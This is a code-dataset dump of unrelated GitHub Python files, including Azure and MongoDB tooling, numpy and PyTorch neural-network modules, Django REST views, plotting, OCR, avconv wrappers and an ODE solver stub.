config = await hub.exec.azurerm.postgresql.configuration.create_or_update(\n ctx=ctx,\n name=name,\n server_name=server_name,\n resource_group=resource_group,\n value=value,\n **config_kwargs,\n )\n\n if action == \"create\":\n ret[\"changes\"] = {\"old\": {}, \"new\": config}\n\n if \"error\" not in config:\n ret[\"result\"] = True\n ret[\"comment\"] = f\"Configuration Setting {name} has been {action}d.\"\n return ret\n\n ret[\"comment\"] = \"Failed to {0} Configuration Setting {1}! ({2})\".format(\n action, name, config.get(\"error\")\n )\n if not ret[\"result\"]:\n ret[\"changes\"] = {}\n return ret\n","repo_name":"eitrtechnologies/idem-azurerm","sub_path":"idem_azurerm/states/azurerm/postgresql/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"15786672315","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Author: Eric Nichols, <eric@ecei.tohoku.ac.jp>\n################################################################################\n\n'''\n`instances2matrix.py`: creates a matrix of co-occurence counts between\nrelation pattern * arguments in mongodb from input instances\n\n### Usage\n\n\tUsage: instances2matrix.py [options] [database] [collection] [<instance_files>]\n\n\tOptions:\n \t-h, --help show this help message and exit\n \t-c COLLECTION, --collection=COLLECTION \n \t\t collection name\n \t-d DB, --database=DB database name\n \t-o HOST, --host=HOST mongodb host machine name. \n \t\t\t default: localhost\n \t-p PORT, --port=PORT mongodb host machine port number. 
\n \t\t\t default: 27017\n\n### Instances\n\n#### Format\n\nInstances have the following tab-delimited format:\n\n* `score`: score representing weight * co-occurence count for instance\n* `loc`: giving source and location of instance\n* `rel`: containing relation pattern\n* `argc`: giving argument count\n* `argv`: tab-delimited list of arguments as strings\n\n#### Example\n\n 1.0\\treverb_clueweb_tuples-1.1.txt:30:10-11\\tARG1 acquired ARG2\\t2\\Google\\tYouTube\n \n### Co-occurence Matrix\n\n#### Format\n \nThe co-occurence matrix collection has the following fields:\n \n* `rel`: relation pattern\n* `arg1`: first argument\n* ...\n* `argn`: nth argument\n* `score`: score for rel * args tuple\n\n#### Naming Scheme\n\nInstances of differing argument count are stored in separate mongodb\ncollections with names formatted as `<collection>_<argc>`. E.g. if a\ncollection `clueweb` has instances with argument counts of 1, 2, and\n3, then the following collection would be created:\n \n* `clueweb_1`\n* `clueweb_2`\n* `clueweb_3`\n \n#### Indexing\n\nIt is indexed for fast look up of rel, args, and (rel,args) tuples.\n'''\n\nimport fileinput\nimport functools\nimport pymongo\nimport re\nimport sys\nfrom collections import namedtuple\n\nimport mongodb\n\nInstance = namedtuple('Instance', ['score', 'loc', 'rel', 'argc', 'argv'])\n\ndef str2instance(s):\n '''converts tab-delimited string into Instance'''\n ss = s.strip().split('\\t')\n score, loc, rel, argc = ss[:4]\n argv = ss[4:]\n score = float(score)\n argc = int(argc)\n assert len(argv) == argc\n return Instance(score, loc, rel, argc, argv)\n\ndef instance2doc(i):\n '''converts Instance into mongodb document (i.e. dictionary), enumerating all \n args in argv'''\n doc = {'arg%d'%n:v\n for n,v in enumerate(i.argv, 1)}\n doc['score'] = i.score\n doc['rel'] = i.rel\n return doc\n\ndef collection2argc(c):\n '''splits collection name into baseform and argc'''\n return int(c.split('_')[-1])\n\ndef is_matrix_collection(matrix, collection):\n '''returns true if collection name has the form <matrix>_<digit>'''\n return re.match('^%s_[0-9]+$' % matrix, collection)\n\ndef get_matrix_collections(db, matrix):\n '''returns a list of all collections with a name of the form <matrix>_<digit>'''\n return [c\n for c in db.collection_names()\n if is_matrix_collection(matrix, c)]\n\ndef ensure_indices(db, coll):\n x = db[coll].find_one()\n n = len( [k \n for k in x.keys()\n if k.startswith('arg')] )\n # index for <REL,ARG1,...ARGN>\n db[coll].ensure_index(\n [('rel', pymongo.ASCENDING), ] + \\\n [('arg%d'%i, pymongo.ASCENDING)\n for i in xrange(1, n+1)]\n )\n for i in xrange(1, n+1):\n # index for <ARGJ,...,ARGN>\n db[coll].ensure_index(\n [('arg%d'%j, pymongo.ASCENDING)\n for j in xrange(i, n+1)]\n )\n\ndef ensure_matrix_indices(db, matrix):\n '''ensures indices exist on collection for <REL,ARG1,...ARGN> and \n <ARG1,...,ARGN>, <ARG2,...,ARGN>, ..., <ARGN>'''\n print >>sys.stderr, 'ensuring indices for %s ...' % matrix\n for c in get_matrix_collections(db, matrix):\n ensure_indices(db, c)\n print >>sys.stderr, 'ensuring indices for %s: done.' 
% matrix\n\ndef collection_argc(c, argc):\n '''returns collection name appended with _argc'''\n return '%s_%d' % (c, argc)\n\ndef create_collection(db, collection, data):\n '''creates collection containing instances from input files'''\n for a in data:\n i = str2instance(a)\n #print >>sys.stderr, i\n d = instance2doc(i)\n c = collection_argc(collection, i.argc)\n print >>sys.stderr, db[c], i\n db[c].save(d, j=True)\n # ensure indices exist\n ensure_matrix_indices(db, collection)\n\ndef reset_matrix(db, matrix):\n for c in get_matrix_collections(db, matrix):\n fullname = mongodb.fullname(db[c])\n print >>sys.stderr, 'resetting %s ...' % fullname\n db.drop_collection(c)\n print >>sys.stderr, 'resetting %s: done' % fullname\n\nif __name__ == '__main__':\n from optparse import OptionParser\n usage = '''%prog [options] [<instance_file>]'''\n parser = OptionParser(usage=usage)\n parser.add_option('-o', '--host', dest='host', default='localhost',\n help='''mongodb host machine name. default: localhost''') \n parser.add_option('-p', '--port', dest='port', type=int, default=1979,\n help='''mongodb host machine port number. default: 27017''')\n parser.add_option('-r', '--reset',\n action='store_true', dest='reset', default=False,\n help='''reset matrix collections. default: False''')\n options, args = parser.parse_args()\n if len(args) < 2:\n parser.print_help()\n exit(1)\n\n db_, matrix = args[:2]\n files = args[2:]\n connection = pymongo.MongoClient(options.host, options.port)\n db = connection[db_]\n\n if options.reset: reset_matrix(db, matrix)\n\n data = (i.strip() for i in fileinput.input(files))\n create_collection(db, matrix, data)\n","repo_name":"underspecified/web-ka","sub_path":"tools/instances2matrix.py","file_name":"instances2matrix.py","file_ext":"py","file_size_in_byte":5828,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"72418218372","text":"import numpy as np\n\nclass tanh:\n def __init__(self):\n self.params, self.grads = [], []\n self.output = None\n \n def forward(self, x):\n numerator = np.exp(x) - np.exp(-x)\n denominator = np.exp(x) + np.exp(-x)\n self.output = numerator / denominator\n return self.output\n\n def backward(self, dout):\n dout = dout * (1 - np.square(self.output))\n return dout\n\nclass Sigmoid:\n def __init__(self):\n self.params, self.grads = [], []\n self.out = None\n\n def forward(self, x):\n self.out = 1 / (1 + np.exp(-x))\n return 1 / (1 + np.exp(-x))\n \n def backward(self, dout):\n return dout * self.out * (1 - self.out)\n\nclass LSTM:\n def __init__(self, Wh, Wx, b):\n self.grads = []\n self.hidden_size = Wh.shape[0]\n self.W_h = Wh.copy()\n self.W_x = Wx.copy()\n self.b = b.copy()\n self.params = [self.W_x, self.W_h, self.b]\n self.c_t = None\n self.h_t = None\n self.A = None\n self.forget_sigmoid = Sigmoid()\n self.new_info_tanh = tanh()\n self.information_sigmoid = Sigmoid()\n self.output_sigmoid = Sigmoid()\n self.cell_tanh = tanh()\n self.forget_gate = None\n self.new_info = None\n self.info_gate = None\n self.output_gate = None\n self.out_value = None\n self.c_minus_1 = None\n self.h_minus_1 = None\n self.x = None\n\n def forward(self, x, h_t_minus_1, c_minus_1):\n self.x = x\n self.c_minus_1 = c_minus_1\n self.h_minus_1 = h_t_minus_1\n self.A = np.dot(x, self.W_x) + np.dot(h_t_minus_1, self.W_h) + self.b\n forget_index = self.hidden_size\n new_information_index = 2 * self.hidden_size\n input_index = 3 * self.hidden_size\n self.forget_gate = self.forget_sigmoid.forward(self.A[:, 
:forget_index])\n self.new_info = self.new_info_tanh.forward(self.A[:, forget_index:new_information_index])\n self.info_gate = self.information_sigmoid.forward(self.new_info)\n self.output_gate = self.output_sigmoid.forward(self.A[:, input_index:])\n self.c_t = (self.forget_gate * c_minus_1 +\n self.new_info * self.info_gate)\n self.out_value = self.cell_tanh.forward(self.c_t)\n self.h_t = self.output_gate * self.out_value\n return self.h_t, self.c_t\n\n def backward(self, dhnext, dcnext):\n self.grads = []\n do = dhnext * self.out_value\n dcnext += self.output_gate * self.cell_tanh.backward(dhnext)\n dcprev = self.forget_gate * dcnext\n df = self.c_minus_1 * dcnext\n dg = self.info_gate * dcnext\n di = self.new_info * dcnext\n df *= self.forget_sigmoid.backward(1)\n dg *= self.new_info_tanh.backward(1)\n di *= self.information_sigmoid.backward(1)\n do *= self.output_sigmoid.backward(1)\n dA = np.hstack((df, dg, di, do))\n dWx = np.dot(self.x.T, dA)\n dWh = np.dot(self.h_minus_1.T, dA)\n db = dA.copy()\n self.grads = [dWx, dWh, db]\n dhprev = np.dot(dA, self.W_h.T)\n dx = np.dot(dA, self.W_x.T)\n \n return dcprev, dhprev, dx\n\nclass Time_LSTM:\n def __init__(self, Wh, Wx, b, sequence_length):\n self.lstm = []\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.h_t_list = []\n self.c_t_list = []\n for _ in range(sequence_length):\n self.lstm.append(LSTM(Wh, Wx, b))\n \n def forward(self, x, h_t_minus_1, c_minus_1):\n self.h_t_list = []\n self.c_t_list = []\n for index, x_t in enumerate(x):\n h_t_minus_1, c_t_minus_1 = self.lstm[index].forward(x_t, h_t_minus_1, c_minus_1)\n self.h_t_list.append(h_t_minus_1)\n self.c_t_list.append(c_t_minus_1)\n return self.h_t_list, self.c_t_list\n\n def backward(self, dhnext, dcnext):\n Wx, Wh, b = self.params\n dx_list = []\n dcnext_list = []\n dhnext_list = []\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n for reversed_rnn in reversed(self.lstm):\n dcnext, dhnext, dx = reversed_rnn.backward(dhnext, dcnext)\n self.grads[0] += reversed_rnn.grads[0]\n self.grads[1] += reversed_rnn.grads[1]\n self.grads[2] += reversed_rnn.grads[2]\n dx_list.append(dx)\n dcnext_list.append(dcnext)\n dhnext_list.append(dhnext)\n return dcnext_list, dhnext_list, dx_list \n \n##class SGD:\n## def __init__(self, lr = 0.01):\n## self.lr = lr\n##\n## def update(self, params, grads):\n## for i in range(len(params)):\n## params[i] -= self.lr * grads[i]\n\n##input_size = 3\n##hidden_size = 3\n##batch_size = 2\n##\n##W_h = np.random.randn(hidden_size, 4 * hidden_size)\n##W_x = np.random.randn(input_size, 4 * hidden_size)\n##b = np.random.randn(batch_size, 4 * hidden_size)\n##h_t_minus_1 = np.random.randn(2, 3)\n##c_t_minus_1 = np.random.randn(2, 3)\n \n##lstm = LSTM(W_h, W_x, b)\n##x = np.array([[1, 2, 3], [1, 2, 3]])\n##lstm.forward(x, h_t_minus_1, c_t_minus_1)\n##lstm.backward(h_t_minus_1, c_t_minus_1)\n\n\n##x = np.array([[[1, 2, 3], [1, 2, 3]]])\n##rnn = Time_LSTM(W_h, W_x, b, 1)\n##h, c = rnn.forward(x, h_t_minus_1, c_t_minus_1)\n##dcnext, dhnext, dx = rnn.backward(1, 0)\n##optimizer = SGD()\n##optimizer.update(rnn.params, rnn.grads)\n\n\n\n\n","repo_name":"chiayisu/NLP_and_ML_Algorithm","sub_path":"Deep_Learning/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"13764346455","text":"import torch\nimport torch.nn as nn\nimport torch.nn.utils.spectral_norm as 
spectral_norm\nimport torch.nn.functional as F\nfrom typing import Callable\nimport einops\n\n\nclass ThemeMapping(nn.Module):\n def __init__(self, in_dim=3, out_dim=64):\n super(ThemeMapping, self).__init__()\n self.increase_dimension = nn.Sequential(\n nn.Conv2d(in_dim, out_dim, kernel_size=1, stride=1, padding=0, bias=False),\n nn.InstanceNorm2d(out_dim, affine=True),\n nn.LeakyReLU(0.2, inplace=True),\n )\n self.fc1 = nn.Linear(192, out_dim*2)\n self.layernorm1 = nn.LayerNorm(out_dim*2)\n self.fc2 = nn.Linear(out_dim*2, out_dim)\n self.layernorm2 = nn.LayerNorm(out_dim)\n self.act = nn.LeakyReLU()\n\n def forward(self, color_theme): # color theme (B, 3, 1, 3)\n x = self.increase_dimension(color_theme) # color theme (B, 64, 1, 3)\n B, C, H, W = x.size() # color theme (B, 64, 1, 3)\n x = x.reshape(B, -1, C*H*W) # (B, 1, 192)\n x = self.fc1(x) # (B, 1, 128)\n x = self.layernorm1(x) # (B, 1, 128)\n x = self.act(x) # (B, 1, 128)\n x = self.fc2(x) # (B, 1, 64)\n x = self.layernorm2(x)\n return x\n\n\nclass Lambda(nn.Module):\n def __init__(self, func: Callable):\n self.func = func\n super().__init__()\n\n def forward(self, *args, **kwargs):\n return self.func(*args, **kwargs)\n\n\nclass NormConv2d(nn.Conv2d):\n def __init__(self, channels, kernel_size=2):\n super().__init__(1, channels, kernel_size,\n padding='same',\n padding_mode='replicate',\n bias=False)\n\n def forward(self, input: torch.Tensor) -> torch.Tensor:\n B = input.shape[0]\n input = einops.rearrange(input, 'B C H W -> (B C) 1 H W')\n\n weight = self.weight - einops.reduce(self.weight, 'K 1 H W -> K 1 1 1', 'mean')\n output = self._conv_forward(input, weight, self.bias)\n output = einops.rearrange(output, '(B C) K H W -> B C K H W', B=B)\n\n output = torch.abs(output)\n output = einops.reduce(output, 'B C K H W -> B K H W', 'mean')\n\n return output\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, dim_in, dim_out, spec_norm=False, LR=0.01, stride=1, up=False):\n super(ConvBlock, self).__init__()\n\n self.up = up\n if self.up:\n self.up_smaple = nn.UpsamplingBilinear2d(scale_factor=2)\n else:\n self.up_smaple = None\n\n if spec_norm:\n self.main = nn.Sequential(\n spectral_norm(nn.Conv2d(dim_in, dim_out, kernel_size=3, stride=stride, padding=1, bias=False)),\n nn.InstanceNorm2d(dim_out, affine=True, track_running_stats=True),\n nn.LeakyReLU(LR, inplace=True),\n )\n\n else:\n self.main = nn.Sequential(\n nn.Conv2d(dim_in, dim_out, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.InstanceNorm2d(dim_out, affine=True, track_running_stats=True),\n nn.LeakyReLU(LR, inplace=True),\n )\n\n def forward(self, x1, x2=None):\n if self.up_smaple is not None:\n x1 = self.up_smaple(x1)\n # input is CHW\n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3]\n\n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd\n x = torch.cat([x2, x1], dim=1)\n return self.main(x)\n else:\n return self.main(x1)\n\n\nclass Encoder(nn.Module):\n def __init__(self, in_channels=1, spec_norm=False, LR=0.2):\n super(Encoder, self).__init__()\n\n self.layer1 = ConvBlock(in_channels, 16, spec_norm, LR=LR) # 256\n self.layer2 = ConvBlock(16, 16, spec_norm, LR=LR) # 256\n self.layer3 = ConvBlock(16, 16, spec_norm, LR=LR) # 128\n self.layer4 = ConvBlock(16, 
16, spec_norm, LR=LR) # 128\n self.layer5 = ConvBlock(16, 16, spec_norm, LR=LR) # 64\n self.layer6 = ConvBlock(16, 16, spec_norm, LR=LR) # 64\n self.layer7 = ConvBlock(16, 16, spec_norm, LR=LR) # 32\n self.layer8 = ConvBlock(16, 16, spec_norm, LR=LR) # 32\n self.layer9 = ConvBlock(16, 16, spec_norm, LR=LR) # 16\n self.layer10 = ConvBlock(16, 16, spec_norm, LR=LR) # 16\n self.last_conv = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1)\n\n def forward(self, x):\n feature_map1 = self.layer1(x)\n feature_map2 = self.layer2(feature_map1)\n feature_map3 = self.layer3(feature_map2)\n feature_map4 = self.layer4(feature_map3)\n feature_map5 = self.layer5(feature_map4)\n feature_map6 = self.layer6(feature_map5)\n feature_map7 = self.layer7(feature_map6)\n feature_map8 = self.layer8(feature_map7)\n feature_map9 = self.layer9(feature_map8)\n feature_map10 = self.layer10(feature_map9)\n output = feature_map10\n output = self.last_conv(output)\n\n return output\n\n\nclass ReferenceGenerator(nn.Module):\n def __init__(self, in_dim=3, color_num=3, mid_dim=144, style_dim=48):\n super(ReferenceGenerator, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear(in_dim*color_num, mid_dim),\n nn.LayerNorm(mid_dim),\n nn.LeakyReLU(),\n nn.Linear(mid_dim, mid_dim),\n nn.LayerNorm(mid_dim),\n nn.LeakyReLU(),\n nn.Linear(mid_dim, style_dim*2),\n nn.LayerNorm(style_dim*2),\n nn.LeakyReLU(),\n nn.Linear(style_dim*2, style_dim),\n nn.Tanh(),\n )\n\n def forward(self, color_theme): # color theme (B, 3, 1, 5)\n B, C, H, W = color_theme.size() # color theme (B, 3, 1, 5)\n x = color_theme.reshape(B, -1) # (B, -1)\n x = self.model(x) # (B, 48)\n return x\n\n # def forward_interpolation(self, color_theme): # color theme (B, 3, 1, 5)\n # B, C, H, W = color_theme[0].size() # color theme (B, 3, 1, 5)\n # x1 = color_theme[0].reshape(B, -1) # (B, -1)\n # x1 = self.model(x1) # (B, 48)\n #\n # x2 = color_theme[1].reshape(B, -1)\n # x2 = self.model(x2)\n #\n # x = x1 * 0.2 + x2 * 0.8\n # x = torch.clip(x, -1, 1)\n #\n # return x\n\n\n","repo_name":"sk-wu/FlexIcon","sub_path":"models/reference_generator_palette.py","file_name":"reference_generator_palette.py","file_ext":"py","file_size_in_byte":6735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37454404425","text":"# wygenerować obrazek PNM o rozmiarze 32x32\n# zawierający naprzemiennie dwa kolory (dowolne)\n\nSZER = 32\nWYS = 32\n\nf = open(\"zadanie02.pnm\", \"w\")\nf.write(f\"P3 {SZER} {WYS} 255\\n\")\n\nfor y in range(WYS):\n for x in range(SZER):\n if y % 2 == 0:\n f.write(\"255 128 0\\n\")\n else:\n f.write(\"10 250 10\\n\")\n","repo_name":"Strzelec85/Prace","sub_path":"pliki/zadanie02.py","file_name":"zadanie02.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37836166532","text":"from django.shortcuts import render\n\n#imports for api view \n#api view, rest-framework respose\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\n#imports for serialization\nfrom rest_framework import serializers\n\n#importing model for serialiazation of data\nfrom .models import Supplies\n \n \n#creating serializer\nclass SuppliesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Supplies #model to serialize\n fields = '__all__' #fields in model t serialize\n\n\n# Create your views here.\n\n#overview of api url navigations\n@api_view(['GET']) #deorator allows 
only get call for this view\ndef api_nav(request):\n api_urls_overview = {\n 'create': '/api/add-supplies/',\n 'read': '/api/view-supplies/',\n 'update': '/api/update-supplies/<int:id>',\n 'delete': '/api/delete-supplies/<int:id>',\n }\n return Response(api_urls_overview)\n\n#add supplies to the api\n@api_view(['POST']) #Post api view decorator for adding supplies\ndef add_supplies(request):\n #request for user data\n entered_data = request.data\n \n #add user entered data to model\n serializer_obj = SuppliesSerializer(data=entered_data)\n \n #check if data is valid, if true save\n if serializer_obj.is_valid():\n serializer_obj.save()\n\n return Response(serializer_obj.data)\n\n#view supplies\n@api_view(['GET'])\ndef view_supplies(request):\n #creating View_supplies objects and pass it to SuppliesSerializer class\n view_supplies = Supplies.objects.all()\n serializer_obj = SuppliesSerializer(view_supplies, many=True)\n \n return Response(serializer_obj.data)\n\n@api_view(['POST'])\ndef update_supplies(request, pk):\n #get instance to be updates\n update_supplies = Supplies.objects.get(id=pk)\n #get value to be updated\n entered_data = request.data\n \n #override instance and data os suppliesserializer class\n serializer_obj = SuppliesSerializer(instance=update_supplies, data=entered_data)\n \n if serializer_obj.is_valid():\n serializer_obj.save()\n\n return Response(serializer_obj.data)\n \n \n@api_view(['DELETE'])\ndef delete_supplies(request, pk):\n del_supplies = Supplies.objects.get(id=pk)\n del_supplies.delete()\n \n return Response(\"Item deleted!\")","repo_name":"bharath4488/django-api","sub_path":"api_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20078456941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 15 20:16:39 2019\n\n@author: ankusmanish\n\"\"\"\n\n#Write a Python program to display the grid and draw line charts of the closing value of Alphabet Inc. 
between October 3, 2016 to October 7, 2016\n\n\"\"\"\nDate,Close\n03-10-16,772.559998\n04-10-16,776.429993\n05-10-16,776.469971\n06-10-16,776.859985\n07-10-16,775.080017\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndata = pd.read_clipboard(sep = ',')\nx = data['Date']\ny = data['Close']\nplt.plot(x,y)\nplt.xlabel('Date')\nplt.ylabel('Closing Value')\nplt.grid(linewidth=0.5,linestyle='dashdot',color='k')\nplt.title('closing value of Alphabet Inc')\nplt.tick_params(\n axis='x', # changes apply to the x-axis\n labelbottom=False)\nplt.show()","repo_name":"AnkusManish/Machine-Learning","sub_path":"Week4/Matplotlib/Matplotlib/Program_14.py","file_name":"Program_14.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27018406852","text":"from src import nms_api, test_api\nfrom src.enum_types_constants import RouteTypes, PriorityTypes, StationModes\nfrom utilities.network_up.mf_hub_1stn_up import MfHub1StnUp\n\noptions_path = 'test_scenarios.form_confirmation.shaper'\nbackup_name = 'default_config.txt'\n\n\nclass ShaperConfirmationCase(MfHub1StnUp):\n \"\"\"\"\"\"\n\n __author__ = 'dkudryashov'\n __version__ = '4.0.0.25'\n __execution_time__ = None # approximate case execution time in seconds\n mf_hub_uhp = None\n stn1_uhp = None\n\n @classmethod\n def set_up_class(cls):\n super().set_up_class()\n test_options = test_api.get_options(options_path)\n # Creating and applying shaper to VNO\n shp = nms_api.create('network:0', 'shaper', test_options.get('vno_stn_shaper'))\n nms_api.update('vno:0', {'stn_shaper': shp})\n # Creating a shaper to individually assign to station\n shp = nms_api.create('network:0', 'shaper', test_options.get('stn_shaper'))\n # Adding 8 dummy stations\n for i in range(1, 9):\n stn = nms_api.create('vno:0', 'station', {\n 'name': f'dummy{i}',\n 'serial': 10000 + i,\n 'enable': True,\n 'rx_controller': 'controller:0',\n 'mode': StationModes.STAR,\n })\n # Assigning individual stn_shaper to every even station\n if i % 2 == 0:\n nms_api.update(stn, {'stn_shaper': shp})\n\n def test_sample(self):\n pass","repo_name":"underdark456/test_system","sub_path":"test_scenarios/form_confirmation/shaper/case_shaper_confirmation.py","file_name":"case_shaper_confirmation.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29182909805","text":"import aiohttp\n\nasync def get_rank():\n num = 0\n while True:\n num += 1\n async with aiohttp.ClientSession() as cs:\n async with cs.get(f'https://api.koreanbots.dev/bots/get?page={num}') as r:\n response = await r.json()\n data = [x['name'] for x in response['data']]\n if \"미야\" in data:\n index = data.index('미야')\n result = 9 * (num - 1) + (index + 1)\n return result\n\n","repo_name":"fossabot/Miya","sub_path":"utils/koreanbots.py","file_name":"koreanbots.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33504504926","text":"\"\"\"Functions for controlling and inspecting avconv.\"\"\"\n\nfrom decimal import Decimal\nfrom subprocess import call, check_output\nimport sys\n\nfrom django.conf import settings\n\n\nif sys.platform == 'linux2':\n\n AVPROBE_PATH = getattr(settings, 'AVPROBE_PATH', '/usr/bin/avprobe')\n AVPROBE_ARGS = [\n '-loglevel', 'error',\n '-f', 'mp3',\n '-show_format',\n ]\n AVCONV_PATH = getattr(settings, 
'AVCONV_PATH', '/usr/bin/avconv')\n AVCONV_ARGS = [\n '-f', 'mp3',\n '-i',\n ]\n\nelif sys.platform == 'darwin':\n\n AVPROBE_PATH = getattr(settings, 'AVPROBE_PATH', '/usr/local/bin/ffprobe')\n AVPROBE_ARGS = [\n '-loglevel', 'error',\n '-f', 'mp3',\n '-show_format',\n ]\n AVCONV_PATH = getattr(settings, 'AVCONV_PATH', '/usr/local/bin/ffmpeg')\n AVCONV_ARGS = [\n '-f', 'mp3',\n '-i',\n ]\n\n\nQUANTIZE_EXPONENT = Decimal('0.01')\n\n\ndef media_length(filename):\n \"\"\"\n Use avconv to determine the length of the media.\n\n :param filename: Filename of media to inspect.\n :return: Length, in seconds of the media.\n \"\"\"\n args = (\n [AVPROBE_PATH]\n + AVPROBE_ARGS\n + [filename]\n )\n output = check_output(args)\n for line in output.splitlines():\n if line.startswith('duration'):\n duration = line.strip().split('=')[1]\n duration = Decimal(duration).quantize(QUANTIZE_EXPONENT)\n return duration\n raise ValueError('Could not find duration for {filename}'.format(**locals()))\n\n\ndef convert(raw_file, processed_file, avconv_settings):\n \"\"\"\n Convert a raw file to a processed file using the given list of settings.\n :param raw_file: Full path of raw file to read.\n :param processed_file: Full path of processed file to write.\n :param avconv_settings: List of strings of command-line options.\n :return: Exit code of avconv.\n \"\"\"\n args = (\n [AVCONV_PATH]\n + AVCONV_ARGS\n + [raw_file]\n + list(avconv_settings)\n + [processed_file]\n )\n return call(args)\n","repo_name":"fanscribed/fanscribed","sub_path":"fanscribed/apps/media/avlib.py","file_name":"avlib.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"33"} +{"seq_id":"3691700113","text":"# Найти средний балл на потоке (по всей таблице оценок).\n\nimport sqlite3\n\n\ndef execute_query(sql: str) -> list:\n with sqlite3.connect(\"university.db\") as con:\n cur = con.cursor()\n cur.execute(sql)\n return cur.fetchall()\n\n\nsql = \"\"\"\nSELECT round(AVG(m.mark), 2) FROM marks AS m;\n\"\"\"\n\nif __name__ == \"__main__\":\n print(execute_query(sql))\n","repo_name":"vokur13/goit-python-web-hw6-ii","sub_path":"query_4.py","file_name":"query_4.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20018087530","text":"from PIL import Image, ImageOps\nimport pytesseract\nimport os\nfrom csv import DictWriter\n\nRAW_IMAGE_PATH = os.path.join(os.getcwd(), 'cropped')\nDATA_PATH = os.path.join(os.getcwd(), 'data', 'yikyak.csv')\nconfig = '--psm 6'\n\nf = open(DATA_PATH, 'w')\nfieldnames = [\"content\"]\noutfile = DictWriter(f, fieldnames=fieldnames)\noutfile.writeheader()\nfor img_name in os.listdir(RAW_IMAGE_PATH):\n img_path = os.path.join(RAW_IMAGE_PATH, img_name)\n image = ImageOps.invert(Image.open(img_path).convert(\"L\"))\n text = pytesseract.image_to_string(image, lang='eng')\n \n text = text.strip().replace(\"\\n\", \" \")\n outfile.writerow({\"content\": text})\n\nf.close()\n\n \n \n","repo_name":"syedtaz/gate-yak-nlp","sub_path":"ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"1208469838","text":"from django.shortcuts import render\nfrom .models import Building\nfrom django.http import JsonResponse\n\n\ndef getfloors(request):\n buil_id = request.GET.get('id_building','')\n floor = 0\n try:\n floor = 
Building.objects.filter(pk=buil_id).first().floors\n except:\n print('error')\n \n if floor:\n data=[(str(x),str(x))for x in range(1, floor + 1)] \n # data=[role_name for role_name in Building.objects.filter(pk=mapi).first()]\n return JsonResponse(data, safe=False)","repo_name":"akshaymishra5395/dependent","sub_path":"takelog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"74692871133","text":"\"\"\"\n-----\nID : diffSolvers.py\nAuthor : Taygun Bulmus\nE-Mail : bulmust@gmail.com\n-----\n\"\"\"\nimport time\nimport datetime\nimport os as osCommand\nfrom shutil import rmtree\n#import numpy as np\nimport RHS as func\nimport odeintw as integralSolver\n\n#from .readFiles import technicalParameters_read\n# Various Scripts\n#import taygunsScripts as tScripts\n\n# ============================\n# Colors For Printing\nclass tLog:\n INFO = '\\033[94m'+'[INFO] '+'\\033[0m'\n OK = '\\033[92m'+'[OK] '+'\\033[0m'\n WARNING = '\\033[93m'+'[WARNING] '+'\\033[0m'\n ERROR = '\\033[91m'+'[ERROR] '+'\\033[0m'\n EXIT = '\\033[91m'+'[EXIT] diffSolvers.py'+'\\033[0m'\n# ============================\n\n# ============================\n# Scipy Differential Equation Solver: LSODA (odeintw)\ndef odeintwSolver(init, RESULTS_SIMULATION_DIR):\n \"\"\"\n Definitions\n -----------\n Ordinary differential equation with initial value problem\n solver using modified default numpy ivp solver odeint called\n [odeintw](https://github.com/WarrenWeckesser/odeintw).\n odeintw is the modification of odeint core\n but it considers complex value inputs. The solving method is\n LSODA, see ref: [1](https://computing.llnl.gov/casc/odepack/) and\n [2](https://doi.org/10.1137/0904010)\n \"\"\"\n # ============================\n # Start calculating time\n timeInitialClock = time.time()\n timeInitialDate = datetime.datetime.now()\n 